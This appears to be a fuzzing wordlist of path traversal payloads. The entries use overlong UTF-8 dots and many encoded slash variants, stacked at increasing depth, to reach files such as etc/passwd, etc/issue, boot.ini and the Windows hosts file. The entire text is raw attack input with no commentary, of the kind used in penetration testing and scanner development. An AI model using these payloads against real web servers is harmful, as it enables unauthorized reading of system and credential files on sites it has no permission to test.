-%c0%ae%c0%ae%c1%8s%c0%ae%c0%ae%c1%8s%c0%ae%c0%ae%c1%8s%c0%ae%c0%ae%c1%8setc%c1%8sissue -%c0%ae%c0%ae%c1%8s%c0%ae%c0%ae%c1%8s%c0%ae%c0%ae%c1%8s%c0%ae%c0%ae%c1%8sboot.ini -%c0%ae%c0%ae%c1%8s%c0%ae%c0%ae%c1%8s%c0%ae%c0%ae%c1%8s%c0%ae%c0%ae%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%c0%ae%c0%ae%c1%8s%c0%ae%c0%ae%c1%8s%c0%ae%c0%ae%c1%8s%c0%ae%c0%ae%c1%8s%c0%ae%c0%ae%c1%8setc%c1%8spasswd -%c0%ae%c0%ae%c1%8s%c0%ae%c0%ae%c1%8s%c0%ae%c0%ae%c1%8s%c0%ae%c0%ae%c1%8s%c0%ae%c0%ae%c1%8setc%c1%8sissue -%c0%ae%c0%ae%c1%8s%c0%ae%c0%ae%c1%8s%c0%ae%c0%ae%c1%8s%c0%ae%c0%ae%c1%8s%c0%ae%c0%ae%c1%8sboot.ini -%c0%ae%c0%ae%c1%8s%c0%ae%c0%ae%c1%8s%c0%ae%c0%ae%c1%8s%c0%ae%c0%ae%c1%8s%c0%ae%c0%ae%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%c0%ae%c0%ae%c1%8s%c0%ae%c0%ae%c1%8s%c0%ae%c0%ae%c1%8s%c0%ae%c0%ae%c1%8s%c0%ae%c0%ae%c1%8s%c0%ae%c0%ae%c1%8setc%c1%8spasswd -%c0%ae%c0%ae%c1%8s%c0%ae%c0%ae%c1%8s%c0%ae%c0%ae%c1%8s%c0%ae%c0%ae%c1%8s%c0%ae%c0%ae%c1%8s%c0%ae%c0%ae%c1%8setc%c1%8sissue -%c0%ae%c0%ae%c1%8s%c0%ae%c0%ae%c1%8s%c0%ae%c0%ae%c1%8s%c0%ae%c0%ae%c1%8s%c0%ae%c0%ae%c1%8s%c0%ae%c0%ae%c1%8sboot.ini -%c0%ae%c0%ae%c1%8s%c0%ae%c0%ae%c1%8s%c0%ae%c0%ae%c1%8s%c0%ae%c0%ae%c1%8s%c0%ae%c0%ae%c1%8s%c0%ae%c0%ae%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%c0%ae%c0%ae%c1%1cetc%c1%1cpasswd -%c0%ae%c0%ae%c1%1cetc%c1%1cissue -%c0%ae%c0%ae%c1%1cboot.ini -%c0%ae%c0%ae%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1cetc%c1%1cpasswd -%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1cetc%c1%1cissue -%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1cboot.ini -%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1cetc%c1%1cpasswd -%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1cetc%c1%1cissue -%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1cboot.ini -%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1cetc%c1%1cpasswd -%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1cetc%c1%1cissue -%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1cboot.ini -%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1cetc%c1%1cpasswd -%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1cetc%c1%1cissue -%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1cboot.ini -%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1cetc%c1%1cpasswd -%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1cetc%c1%1cissue -%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1cboot.ini -%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1c%c0%ae%c0%ae%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%c0%ae%c0%ae%c1%afetc%c1%afpasswd -%c0%ae%c0%ae%c1%afetc%c1%afissue -%c0%ae%c0%ae%c1%afboot.ini -%c0%ae%c0%ae%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%c0%ae%c0%ae%c1%af%c0%ae%c0%ae%c1%afetc%c1%afpasswd -%c0%ae%c0%ae%c1%af%c0%ae%c0%ae%c1%afetc%c1%afissue -%c0%ae%c0%ae%c1%af%c0%ae%c0%ae%c1%afboot.ini -%c0%ae%c0%ae%c1%af%c0%ae%c0%ae%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%c0%ae%c0%ae%c1%af%c0%ae%c0%ae%c1%af%c0%ae%c0%ae%c1%afetc%c1%afpasswd -%c0%ae%c0%ae%c1%af%c0%ae%c0%ae%c1%af%c0%ae%c0%ae%c1%afetc%c1%afissue -%c0%ae%c0%ae%c1%af%c0%ae%c0%ae%c1%af%c0%ae%c0%ae%c1%afboot.ini -%c0%ae%c0%ae%c1%af%c0%ae%c0%ae%c1%af%c0%ae%c0%ae%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%c0%ae%c0%ae%c1%af%c0%ae%c0%ae%c1%af%c0%ae%c0%ae%c1%af%c0%ae%c0%ae%c1%afetc%c1%afpasswd -%c0%ae%c0%ae%c1%af%c0%ae%c0%ae%c1%af%c0%ae%c0%ae%c1%af%c0%ae%c0%ae%c1%afetc%c1%afissue -%c0%ae%c0%ae%c1%af%c0%ae%c0%ae%c1%af%c0%ae%c0%ae%c1%af%c0%ae%c0%ae%c1%afboot.ini -%c0%ae%c0%ae%c1%af%c0%ae%c0%ae%c1%af%c0%ae%c0%ae%c1%af%c0%ae%c0%ae%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%c0%ae%c0%ae%c1%af%c0%ae%c0%ae%c1%af%c0%ae%c0%ae%c1%af%c0%ae%c0%ae%c1%af%c0%ae%c0%ae%c1%afetc%c1%afpasswd -%c0%ae%c0%ae%c1%af%c0%ae%c0%ae%c1%af%c0%ae%c0%ae%c1%af%c0%ae%c0%ae%c1%af%c0%ae%c0%ae%c1%afetc%c1%afissue -%c0%ae%c0%ae%c1%af%c0%ae%c0%ae%c1%af%c0%ae%c0%ae%c1%af%c0%ae%c0%ae%c1%af%c0%ae%c0%ae%c1%afboot.ini -%c0%ae%c0%ae%c1%af%c0%ae%c0%ae%c1%af%c0%ae%c0%ae%c1%af%c0%ae%c0%ae%c1%af%c0%ae%c0%ae%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%c0%ae%c0%ae%c1%af%c0%ae%c0%ae%c1%af%c0%ae%c0%ae%c1%af%c0%ae%c0%ae%c1%af%c0%ae%c0%ae%c1%af%c0%ae%c0%ae%c1%afetc%c1%afpasswd -%c0%ae%c0%ae%c1%af%c0%ae%c0%ae%c1%af%c0%ae%c0%ae%c1%af%c0%ae%c0%ae%c1%af%c0%ae%c0%ae%c1%af%c0%ae%c0%ae%c1%afetc%c1%afissue -%c0%ae%c0%ae%c1%af%c0%ae%c0%ae%c1%af%c0%ae%c0%ae%c1%af%c0%ae%c0%ae%c1%af%c0%ae%c0%ae%c1%af%c0%ae%c0%ae%c1%afboot.ini -%c0%ae%c0%ae%c1%af%c0%ae%c0%ae%c1%af%c0%ae%c0%ae%c1%af%c0%ae%c0%ae%c1%af%c0%ae%c0%ae%c1%af%c0%ae%c0%ae%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%c0%ae%c0%ae%bg%qfetc%bg%qfpasswd -%c0%ae%c0%ae%bg%qfetc%bg%qfissue -%c0%ae%c0%ae%bg%qfboot.ini -%c0%ae%c0%ae%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%c0%ae%c0%ae%bg%qf%c0%ae%c0%ae%bg%qfetc%bg%qfpasswd -%c0%ae%c0%ae%bg%qf%c0%ae%c0%ae%bg%qfetc%bg%qfissue -%c0%ae%c0%ae%bg%qf%c0%ae%c0%ae%bg%qfboot.ini -%c0%ae%c0%ae%bg%qf%c0%ae%c0%ae%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%c0%ae%c0%ae%bg%qf%c0%ae%c0%ae%bg%qf%c0%ae%c0%ae%bg%qfetc%bg%qfpasswd -%c0%ae%c0%ae%bg%qf%c0%ae%c0%ae%bg%qf%c0%ae%c0%ae%bg%qfetc%bg%qfissue -%c0%ae%c0%ae%bg%qf%c0%ae%c0%ae%bg%qf%c0%ae%c0%ae%bg%qfboot.ini -%c0%ae%c0%ae%bg%qf%c0%ae%c0%ae%bg%qf%c0%ae%c0%ae%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%c0%ae%c0%ae%bg%qf%c0%ae%c0%ae%bg%qf%c0%ae%c0%ae%bg%qf%c0%ae%c0%ae%bg%qfetc%bg%qfpasswd -%c0%ae%c0%ae%bg%qf%c0%ae%c0%ae%bg%qf%c0%ae%c0%ae%bg%qf%c0%ae%c0%ae%bg%qfetc%bg%qfissue -%c0%ae%c0%ae%bg%qf%c0%ae%c0%ae%bg%qf%c0%ae%c0%ae%bg%qf%c0%ae%c0%ae%bg%qfboot.ini -%c0%ae%c0%ae%bg%qf%c0%ae%c0%ae%bg%qf%c0%ae%c0%ae%bg%qf%c0%ae%c0%ae%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%c0%ae%c0%ae%bg%qf%c0%ae%c0%ae%bg%qf%c0%ae%c0%ae%bg%qf%c0%ae%c0%ae%bg%qf%c0%ae%c0%ae%bg%qfetc%bg%qfpasswd -%c0%ae%c0%ae%bg%qf%c0%ae%c0%ae%bg%qf%c0%ae%c0%ae%bg%qf%c0%ae%c0%ae%bg%qf%c0%ae%c0%ae%bg%qfetc%bg%qfissue -%c0%ae%c0%ae%bg%qf%c0%ae%c0%ae%bg%qf%c0%ae%c0%ae%bg%qf%c0%ae%c0%ae%bg%qf%c0%ae%c0%ae%bg%qfboot.ini -%c0%ae%c0%ae%bg%qf%c0%ae%c0%ae%bg%qf%c0%ae%c0%ae%bg%qf%c0%ae%c0%ae%bg%qf%c0%ae%c0%ae%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%c0%ae%c0%ae%bg%qf%c0%ae%c0%ae%bg%qf%c0%ae%c0%ae%bg%qf%c0%ae%c0%ae%bg%qf%c0%ae%c0%ae%bg%qf%c0%ae%c0%ae%bg%qfetc%bg%qfpasswd -%c0%ae%c0%ae%bg%qf%c0%ae%c0%ae%bg%qf%c0%ae%c0%ae%bg%qf%c0%ae%c0%ae%bg%qf%c0%ae%c0%ae%bg%qf%c0%ae%c0%ae%bg%qfetc%bg%qfissue -%c0%ae%c0%ae%bg%qf%c0%ae%c0%ae%bg%qf%c0%ae%c0%ae%bg%qf%c0%ae%c0%ae%bg%qf%c0%ae%c0%ae%bg%qf%c0%ae%c0%ae%bg%qfboot.ini -%c0%ae%c0%ae%bg%qf%c0%ae%c0%ae%bg%qf%c0%ae%c0%ae%bg%qf%c0%ae%c0%ae%bg%qf%c0%ae%c0%ae%bg%qf%c0%ae%c0%ae%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%c0%ae%c0%ae%u2215etc%u2215passwd -%c0%ae%c0%ae%u2215etc%u2215issue -%c0%ae%c0%ae%u2215boot.ini -%c0%ae%c0%ae%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215etc%u2215passwd -%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215etc%u2215issue -%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215boot.ini -%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215etc%u2215passwd -%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215etc%u2215issue -%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215boot.ini -%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215etc%u2215passwd -%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215etc%u2215issue -%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215boot.ini -%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215etc%u2215passwd -%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215etc%u2215issue -%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215boot.ini -%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215etc%u2215passwd -%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215etc%u2215issue -%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215boot.ini -%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215%c0%ae%c0%ae%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%c0%ae%c0%ae%u2216etc%u2216passwd -%c0%ae%c0%ae%u2216etc%u2216issue -%c0%ae%c0%ae%u2216boot.ini -%c0%ae%c0%ae%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%c0%ae%c0%ae%u2216%c0%ae%c0%ae%u2216etc%u2216passwd -%c0%ae%c0%ae%u2216%c0%ae%c0%ae%u2216etc%u2216issue -%c0%ae%c0%ae%u2216%c0%ae%c0%ae%u2216boot.ini -%c0%ae%c0%ae%u2216%c0%ae%c0%ae%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%c0%ae%c0%ae%u2216%c0%ae%c0%ae%u2216%c0%ae%c0%ae%u2216etc%u2216passwd -%c0%ae%c0%ae%u2216%c0%ae%c0%ae%u2216%c0%ae%c0%ae%u2216etc%u2216issue -%c0%ae%c0%ae%u2216%c0%ae%c0%ae%u2216%c0%ae%c0%ae%u2216boot.ini -%c0%ae%c0%ae%u2216%c0%ae%c0%ae%u2216%c0%ae%c0%ae%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%c0%ae%c0%ae%u2216%c0%ae%c0%ae%u2216%c0%ae%c0%ae%u2216%c0%ae%c0%ae%u2216etc%u2216passwd -%c0%ae%c0%ae%u2216%c0%ae%c0%ae%u2216%c0%ae%c0%ae%u2216%c0%ae%c0%ae%u2216etc%u2216issue -%c0%ae%c0%ae%u2216%c0%ae%c0%ae%u2216%c0%ae%c0%ae%u2216%c0%ae%c0%ae%u2216boot.ini -%c0%ae%c0%ae%u2216%c0%ae%c0%ae%u2216%c0%ae%c0%ae%u2216%c0%ae%c0%ae%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%c0%ae%c0%ae%u2216%c0%ae%c0%ae%u2216%c0%ae%c0%ae%u2216%c0%ae%c0%ae%u2216%c0%ae%c0%ae%u2216etc%u2216passwd -%c0%ae%c0%ae%u2216%c0%ae%c0%ae%u2216%c0%ae%c0%ae%u2216%c0%ae%c0%ae%u2216%c0%ae%c0%ae%u2216etc%u2216issue -%c0%ae%c0%ae%u2216%c0%ae%c0%ae%u2216%c0%ae%c0%ae%u2216%c0%ae%c0%ae%u2216%c0%ae%c0%ae%u2216boot.ini -%c0%ae%c0%ae%u2216%c0%ae%c0%ae%u2216%c0%ae%c0%ae%u2216%c0%ae%c0%ae%u2216%c0%ae%c0%ae%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%c0%ae%c0%ae%u2216%c0%ae%c0%ae%u2216%c0%ae%c0%ae%u2216%c0%ae%c0%ae%u2216%c0%ae%c0%ae%u2216%c0%ae%c0%ae%u2216etc%u2216passwd -%c0%ae%c0%ae%u2216%c0%ae%c0%ae%u2216%c0%ae%c0%ae%u2216%c0%ae%c0%ae%u2216%c0%ae%c0%ae%u2216%c0%ae%c0%ae%u2216etc%u2216issue -%c0%ae%c0%ae%u2216%c0%ae%c0%ae%u2216%c0%ae%c0%ae%u2216%c0%ae%c0%ae%u2216%c0%ae%c0%ae%u2216%c0%ae%c0%ae%u2216boot.ini -%c0%ae%c0%ae%u2216%c0%ae%c0%ae%u2216%c0%ae%c0%ae%u2216%c0%ae%c0%ae%u2216%c0%ae%c0%ae%u2216%c0%ae%c0%ae%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%c0%ae%c0%ae%uEFC8etc%uEFC8passwd -%c0%ae%c0%ae%uEFC8etc%uEFC8issue -%c0%ae%c0%ae%uEFC8boot.ini -%c0%ae%c0%ae%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%c0%ae%c0%ae%uEFC8%c0%ae%c0%ae%uEFC8etc%uEFC8passwd -%c0%ae%c0%ae%uEFC8%c0%ae%c0%ae%uEFC8etc%uEFC8issue -%c0%ae%c0%ae%uEFC8%c0%ae%c0%ae%uEFC8boot.ini -%c0%ae%c0%ae%uEFC8%c0%ae%c0%ae%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%c0%ae%c0%ae%uEFC8%c0%ae%c0%ae%uEFC8%c0%ae%c0%ae%uEFC8etc%uEFC8passwd -%c0%ae%c0%ae%uEFC8%c0%ae%c0%ae%uEFC8%c0%ae%c0%ae%uEFC8etc%uEFC8issue -%c0%ae%c0%ae%uEFC8%c0%ae%c0%ae%uEFC8%c0%ae%c0%ae%uEFC8boot.ini -%c0%ae%c0%ae%uEFC8%c0%ae%c0%ae%uEFC8%c0%ae%c0%ae%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%c0%ae%c0%ae%uEFC8%c0%ae%c0%ae%uEFC8%c0%ae%c0%ae%uEFC8%c0%ae%c0%ae%uEFC8etc%uEFC8passwd -%c0%ae%c0%ae%uEFC8%c0%ae%c0%ae%uEFC8%c0%ae%c0%ae%uEFC8%c0%ae%c0%ae%uEFC8etc%uEFC8issue -%c0%ae%c0%ae%uEFC8%c0%ae%c0%ae%uEFC8%c0%ae%c0%ae%uEFC8%c0%ae%c0%ae%uEFC8boot.ini -%c0%ae%c0%ae%uEFC8%c0%ae%c0%ae%uEFC8%c0%ae%c0%ae%uEFC8%c0%ae%c0%ae%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%c0%ae%c0%ae%uEFC8%c0%ae%c0%ae%uEFC8%c0%ae%c0%ae%uEFC8%c0%ae%c0%ae%uEFC8%c0%ae%c0%ae%uEFC8etc%uEFC8passwd -%c0%ae%c0%ae%uEFC8%c0%ae%c0%ae%uEFC8%c0%ae%c0%ae%uEFC8%c0%ae%c0%ae%uEFC8%c0%ae%c0%ae%uEFC8etc%uEFC8issue -%c0%ae%c0%ae%uEFC8%c0%ae%c0%ae%uEFC8%c0%ae%c0%ae%uEFC8%c0%ae%c0%ae%uEFC8%c0%ae%c0%ae%uEFC8boot.ini -%c0%ae%c0%ae%uEFC8%c0%ae%c0%ae%uEFC8%c0%ae%c0%ae%uEFC8%c0%ae%c0%ae%uEFC8%c0%ae%c0%ae%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%c0%ae%c0%ae%uEFC8%c0%ae%c0%ae%uEFC8%c0%ae%c0%ae%uEFC8%c0%ae%c0%ae%uEFC8%c0%ae%c0%ae%uEFC8%c0%ae%c0%ae%uEFC8etc%uEFC8passwd -%c0%ae%c0%ae%uEFC8%c0%ae%c0%ae%uEFC8%c0%ae%c0%ae%uEFC8%c0%ae%c0%ae%uEFC8%c0%ae%c0%ae%uEFC8%c0%ae%c0%ae%uEFC8etc%uEFC8issue -%c0%ae%c0%ae%uEFC8%c0%ae%c0%ae%uEFC8%c0%ae%c0%ae%uEFC8%c0%ae%c0%ae%uEFC8%c0%ae%c0%ae%uEFC8%c0%ae%c0%ae%uEFC8boot.ini -%c0%ae%c0%ae%uEFC8%c0%ae%c0%ae%uEFC8%c0%ae%c0%ae%uEFC8%c0%ae%c0%ae%uEFC8%c0%ae%c0%ae%uEFC8%c0%ae%c0%ae%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -%c0%ae%c0%ae%uF025etc%uF025passwd -%c0%ae%c0%ae%uF025etc%uF025issue -%c0%ae%c0%ae%uF025boot.ini -%c0%ae%c0%ae%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%c0%ae%c0%ae%uF025%c0%ae%c0%ae%uF025etc%uF025passwd -%c0%ae%c0%ae%uF025%c0%ae%c0%ae%uF025etc%uF025issue -%c0%ae%c0%ae%uF025%c0%ae%c0%ae%uF025boot.ini -%c0%ae%c0%ae%uF025%c0%ae%c0%ae%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%c0%ae%c0%ae%uF025%c0%ae%c0%ae%uF025%c0%ae%c0%ae%uF025etc%uF025passwd -%c0%ae%c0%ae%uF025%c0%ae%c0%ae%uF025%c0%ae%c0%ae%uF025etc%uF025issue -%c0%ae%c0%ae%uF025%c0%ae%c0%ae%uF025%c0%ae%c0%ae%uF025boot.ini -%c0%ae%c0%ae%uF025%c0%ae%c0%ae%uF025%c0%ae%c0%ae%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%c0%ae%c0%ae%uF025%c0%ae%c0%ae%uF025%c0%ae%c0%ae%uF025%c0%ae%c0%ae%uF025etc%uF025passwd -%c0%ae%c0%ae%uF025%c0%ae%c0%ae%uF025%c0%ae%c0%ae%uF025%c0%ae%c0%ae%uF025etc%uF025issue -%c0%ae%c0%ae%uF025%c0%ae%c0%ae%uF025%c0%ae%c0%ae%uF025%c0%ae%c0%ae%uF025boot.ini -%c0%ae%c0%ae%uF025%c0%ae%c0%ae%uF025%c0%ae%c0%ae%uF025%c0%ae%c0%ae%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%c0%ae%c0%ae%uF025%c0%ae%c0%ae%uF025%c0%ae%c0%ae%uF025%c0%ae%c0%ae%uF025%c0%ae%c0%ae%uF025etc%uF025passwd -%c0%ae%c0%ae%uF025%c0%ae%c0%ae%uF025%c0%ae%c0%ae%uF025%c0%ae%c0%ae%uF025%c0%ae%c0%ae%uF025etc%uF025issue -%c0%ae%c0%ae%uF025%c0%ae%c0%ae%uF025%c0%ae%c0%ae%uF025%c0%ae%c0%ae%uF025%c0%ae%c0%ae%uF025boot.ini -%c0%ae%c0%ae%uF025%c0%ae%c0%ae%uF025%c0%ae%c0%ae%uF025%c0%ae%c0%ae%uF025%c0%ae%c0%ae%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%c0%ae%c0%ae%uF025%c0%ae%c0%ae%uF025%c0%ae%c0%ae%uF025%c0%ae%c0%ae%uF025%c0%ae%c0%ae%uF025%c0%ae%c0%ae%uF025etc%uF025passwd -%c0%ae%c0%ae%uF025%c0%ae%c0%ae%uF025%c0%ae%c0%ae%uF025%c0%ae%c0%ae%uF025%c0%ae%c0%ae%uF025%c0%ae%c0%ae%uF025etc%uF025issue -%c0%ae%c0%ae%uF025%c0%ae%c0%ae%uF025%c0%ae%c0%ae%uF025%c0%ae%c0%ae%uF025%c0%ae%c0%ae%uF025%c0%ae%c0%ae%uF025boot.ini -%c0%ae%c0%ae%uF025%c0%ae%c0%ae%uF025%c0%ae%c0%ae%uF025%c0%ae%c0%ae%uF025%c0%ae%c0%ae%uF025%c0%ae%c0%ae%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -%c0%ae%c0%ae%%32%%66etc%%32%%66passwd -%c0%ae%c0%ae%%32%%66etc%%32%%66issue -%c0%ae%c0%ae%%32%%66boot.ini -%c0%ae%c0%ae%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%c0%ae%c0%ae%%32%%66%c0%ae%c0%ae%%32%%66etc%%32%%66passwd -%c0%ae%c0%ae%%32%%66%c0%ae%c0%ae%%32%%66etc%%32%%66issue -%c0%ae%c0%ae%%32%%66%c0%ae%c0%ae%%32%%66boot.ini -%c0%ae%c0%ae%%32%%66%c0%ae%c0%ae%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%c0%ae%c0%ae%%32%%66%c0%ae%c0%ae%%32%%66%c0%ae%c0%ae%%32%%66etc%%32%%66passwd -%c0%ae%c0%ae%%32%%66%c0%ae%c0%ae%%32%%66%c0%ae%c0%ae%%32%%66etc%%32%%66issue -%c0%ae%c0%ae%%32%%66%c0%ae%c0%ae%%32%%66%c0%ae%c0%ae%%32%%66boot.ini -%c0%ae%c0%ae%%32%%66%c0%ae%c0%ae%%32%%66%c0%ae%c0%ae%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%c0%ae%c0%ae%%32%%66%c0%ae%c0%ae%%32%%66%c0%ae%c0%ae%%32%%66%c0%ae%c0%ae%%32%%66etc%%32%%66passwd -%c0%ae%c0%ae%%32%%66%c0%ae%c0%ae%%32%%66%c0%ae%c0%ae%%32%%66%c0%ae%c0%ae%%32%%66etc%%32%%66issue -%c0%ae%c0%ae%%32%%66%c0%ae%c0%ae%%32%%66%c0%ae%c0%ae%%32%%66%c0%ae%c0%ae%%32%%66boot.ini -%c0%ae%c0%ae%%32%%66%c0%ae%c0%ae%%32%%66%c0%ae%c0%ae%%32%%66%c0%ae%c0%ae%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -%c0%ae%c0%ae%%32%%66%c0%ae%c0%ae%%32%%66%c0%ae%c0%ae%%32%%66%c0%ae%c0%ae%%32%%66%c0%ae%c0%ae%%32%%66etc%%32%%66passwd -%c0%ae%c0%ae%%32%%66%c0%ae%c0%ae%%32%%66%c0%ae%c0%ae%%32%%66%c0%ae%c0%ae%%32%%66%c0%ae%c0%ae%%32%%66etc%%32%%66issue 